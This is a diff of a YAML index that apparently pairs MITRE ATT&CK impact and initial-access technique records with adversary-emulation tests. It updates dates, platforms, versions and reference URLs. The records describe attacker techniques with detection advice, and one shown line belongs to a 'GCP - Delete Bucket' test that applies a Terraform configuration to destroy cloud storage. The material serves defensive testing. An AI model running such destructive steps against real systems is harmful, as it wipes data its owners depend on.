-        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
-          Miners: A Battle for Resources. Retrieved April 6, 2021.'
-        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
-      - source_name: GoBotKR
-        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
-          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
-        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      - source_name: Sysdig Cryptojacking Proxyjacking 2023
+        description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+          and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1496
     atomic_tests: []
   T1565.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
-      created: '2020-03-02T14:27:00.693Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1565.002
-        url: https://attack.mitre.org/techniques/T1565/002
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
-        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:33:33.983Z'
+      name: Transmitted Data Manipulation
       description: |-
         Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
 
         Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Transmitted Data Manipulation
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
         can be difficult without the appropriate tools. In some cases integrity verification
         checks, such as file hashing, may be used on critical files as they transit
         a network. With some critical processes involving transmission of data, manual
         or out-of-band integrity checking may be useful for identifying manipulated
         data. '
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+      created: '2020-03-02T14:27:00.693Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/002
+        external_id: T1565.002
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1485:
     technique:
-      modified: '2023-10-03T17:30:32.192Z'
+      modified: '2024-09-25T20:46:14.641Z'
       name: Data Destruction
       description: |-
         Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
@@ -58530,7 +59468,7 @@ impact:
 
         To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
 
-        In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
+        In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -58556,9 +59494,10 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Deletion'
+      - 'Cloud Storage: Cloud Storage Modification'
       - 'Process: Process Creation'
       - 'File: File Deletion'
       - 'Image: Image Deletion'
@@ -58614,7 +59553,6 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1485
     atomic_tests:
     - name: GCP - Delete Bucket
@@ -58688,50 +59626,7 @@ impact:
           terraform apply -auto-approve
   T1498:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      - Containers
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Weizman, Azure Defender Research Team
-      - Vishwas Manral, McAfee
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
-      type: attack-pattern
-      created: '2019-04-17T20:23:15.105Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1498
-        url: https://attack.mitre.org/techniques/T1498
-      - source_name: FireEye OpPoisonedHandover February 2016
-        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
-        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
-          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
-          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
-      - source_name: FSISAC FraudNetDoS September 2012
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
-        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
-          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-      - source_name: Symantec DDoS October 2014
-        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
-        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
-          Retrieved April 24, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T16:01:00.510Z'
       name: Network Denial of Service
       description: |-
         Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -58746,6 +59641,10 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_contributors:
+      - Yossi Weizman, Azure Defender Research Team
+      - Vishwas Manral, McAfee
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
         service, but such response time typically requires very aggressive monitoring
@@ -58758,16 +59657,52 @@ impact:
         may be small and the indicator of an event availability of the network or
         service drops. The analysis tools mentioned can then be used to determine
         the type of DoS causing the outage and help with remediation.'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
       x_mitre_impact_type:
       - Availability
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+      created: '2019-04-17T20:23:15.105Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1498
+        external_id: T1498
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: FSISAC FraudNetDoS September 2012
+        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+      - source_name: FireEye OpPoisonedHandover February 2016
+        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+      - source_name: Symantec DDoS October 2014
+        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+          Retrieved April 24, 2019.
+        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1495:
     technique:
@@ -58835,11 +59770,10 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1490:
     technique:
-      modified: '2024-04-12T02:30:08.379Z'
+      modified: '2024-09-24T13:27:31.881Z'
       name: Inhibit System Recovery
       description: |-
         Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
@@ -58857,7 +59791,7 @@ impact:
 
         On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
 
-        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -58884,7 +59818,7 @@ impact:
       - Network
       - IaaS
       - Containers
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -58934,13 +59868,12 @@ impact:
         url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
       - source_name: disable_notif_synology_ransom
         description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
-          servers before ransom. Retrieved October 19, 2022.
-        url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+          servers before ransom. Retrieved September 12, 2024.
+        url: https://x.com/TheDFIRReport/status/1498657590259109894
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1490
     atomic_tests: []
   T1561.001:
@@ -59008,11 +59941,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1529:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T20:45:22.531Z'
       name: System Shutdown/Reboot
       description: |-
         Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. <code>reload</code>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
@@ -59077,13 +60009,12 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1529
     atomic_tests: []
 initial-access:
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -59161,7 +60092,6 @@ initial-access:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests: []
   T1195.001:
@@ -59211,11 +60141,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566.002:
     technique:
-      modified: '2024-04-15T23:51:25.037Z'
+      modified: '2024-10-15T16:06:32.591Z'
       name: 'Phishing: Spearphishing Link'
       description: |-
         Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -59254,10 +60183,10 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '2.6'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
@@ -59274,7 +60203,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: CISA IDN ST05-016
         description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
           Internationalized Domain Names. Retrieved October 20, 2020.'
@@ -59313,12 +60242,11 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.002
     atomic_tests: []
   T1566.001:
     technique:
-      modified: '2024-01-31T14:09:27.066Z'
+      modified: '2024-10-15T16:42:01.552Z'
       name: 'Phishing: Spearphishing Attachment'
       description: "Adversaries may send spearphishing emails with a malicious attachment
         in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -59380,7 +60308,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Unit 42 DarkHydrus July 2018
         description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
           Targets Middle East Government. Retrieved August 2, 2018.
@@ -59397,7 +60325,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.001
     atomic_tests: []
   T1195.003:
@@ -59427,7 +60354,7 @@ initial-access:
         the adversary a high degree of control over the system. Hardware backdoors
         may be inserted into various devices, such as servers, workstations, network
         infrastructure, or peripherals.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:05:10.755Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Hardware Supply Chain
       x_mitre_detection: Perform physical inspection of hardware to look for potential
@@ -59441,7 +60368,6 @@ initial-access:
       - 'Sensor Health: Host Status'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1091:
     technique:
@@ -59504,12 +60430,11 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests: []
   T1195:
     technique:
-      modified: '2024-02-26T14:23:37.009Z'
+      modified: '2024-10-04T11:17:00.778Z'
       name: Supply Chain Compromise
       description: "Adversaries may manipulate products or product delivery mechanisms
         prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -59584,7 +60509,7 @@ initial-access:
         description: Schneider Electric. (2018, August 24). Security Notification
           – USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
           Retrieved May 28, 2019.
-        url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+        url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
       - source_name: Trendmicro NPM Compromise
         description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
           to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
@@ -59598,19 +60523,18 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1195
     atomic_tests: []
   T1190:
     technique:
-      modified: '2023-11-28T21:27:35.373Z'
+      modified: '2024-09-24T14:33:53.433Z'
       name: Exploit Public-Facing Application
       description: |-
         Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
 
-        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
 
-        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
 
         Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
 
@@ -59636,7 +60560,7 @@ initial-access:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '2.5'
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -59691,7 +60615,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1659:
     technique:
@@ -59754,11 +60677,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -59773,6 +60695,7 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -59781,18 +60704,18 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -59824,14 +60747,11 @@ initial-access:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1199:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:08:39.968Z'
       name: Trusted Relationship
       description: |-
         Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
@@ -59842,6 +60762,11 @@ initial-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_contributors:
+      - Praetorian
+      - ExtraHop
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: Establish monitoring for activity conducted by second and
         third party providers and other trusted entities that may be leveraged as
         a means to gain access to the network. Depending on the type of relationship,
@@ -59850,22 +60775,18 @@ initial-access:
         is based on IT services. Adversaries may be able to act quickly towards an
         objective, so proper monitoring for behavior related to Credential Access,
         Lateral Movement, and Collection will be important to detect the intrusion.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Office 365
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '2.3'
-      x_mitre_contributors:
-      - Praetorian
-      - ExtraHop
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.4'
       x_mitre_data_sources:
